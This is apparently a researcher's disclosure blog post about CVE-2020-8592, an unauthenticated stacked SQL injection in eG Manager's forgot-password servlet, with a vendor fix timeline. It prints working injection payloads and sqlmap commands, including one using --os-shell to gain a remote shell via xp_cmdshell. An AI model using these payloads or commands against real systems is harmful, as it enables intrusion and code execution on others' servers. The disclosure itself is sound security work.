SQL Injection lead to Remote Code Execution (CVE-2020-8592)
In this blog post I will show how to exploit a SQL injection vulnerability in the popular java-based MaaS software "eG Manager" and how I can escalated it to execute code remotely.
The SQL injection vulnerability can be exploited as an unauthenticated attacker via forgot password function. An attacker is able to execute stacked SQL queries which means it is possible to manipulate arbitrary database entries and even execute shell commands.
"eG Manager" has a forgot password feature and then there was missing input validation function, e.g. If the Username specified is valid, then the password will be emailed to the user with the given Username. If not so, server shows 'username does not exist'. An attacker can exploit this feature by injecting stacked queries SQL syntax.
Exploiting SQL Injection to Remote Code Execution
In "Forgot Password" area, there is an input box to confirm user identity. If an administrator forgets the login Password, he/she can click on the Forgot Password link. Doing so invokes wherein the administrator would have to provide the Username for which the password details are required, and then click the "Get Password" button to retrieve the password.
eG Manager Forgot Password Area
If the user identify his/her username in forgot password area, "eG Manager" search username in database. if username exists, email will be send to valid mail that is assigned in database. I tested with Boolean based SQL queries
Payload: user=admin' and 1=1--+-
Response: You will receive your password by mail
Sending Boolean Based SQL Queries
Payload: admin' and 1=2--+-
Response: Username does not exist
Sending Boolean Base SQL Queries
I also tested with Stacked based SQL query. The server responded after 6 seconds delay.
Payload: test'; WAITFOR DELAY '0:0:5'--
Sending SQL Stacked Query
I've used "sqlmap" for more exploitation steps.
/usr/bin/sqlmap -u "https://targetIP:port/final/servlet/com.eg.LoginHelperServlet" --data="user=aa*" --dbms=mssql --technique=S --prefix="'" --suffix="--" --dbs -v 3
Exploiting SQL Injection
Since, it was vulnerable for Stacked queries SQL injection, it is possible to pwn the target system. I've used following "sqlmap" command to get remote shell.
/usr/bin/sqlmap -u "https://targetIP:7077/final/servlet/com.eg.LoginHelperServlet" --data="user=aa*" --dbms=mssql --technique=S --prefix="'" --suffix="--" --os-shell -v 3
Remote Code Execution via SQL Injection
2020/01/23 Vulnerability reported to eG Innovations, Inc.
2020/01/28 Vendor addressed issue in 7.1.2
2020/01/29 Vendor fixed and notify their customers.
In this post I analyzed a stacked queries SQL injection vulnerability in "eG Manager v7" which can be triggered through a JSP file. An attacker needs to know username and then he can inject arbitrary SQL commands. I found that is possible to leverage the issue into Remote Code Execution if the "eG Manager" enabled the xp_cmdshell option. However, if other databases are used, Remote Code Execution might be still possible. I would like to thank the "eG Innovations, Inc" security team for the professional communication and for the very fast resolution of the issue.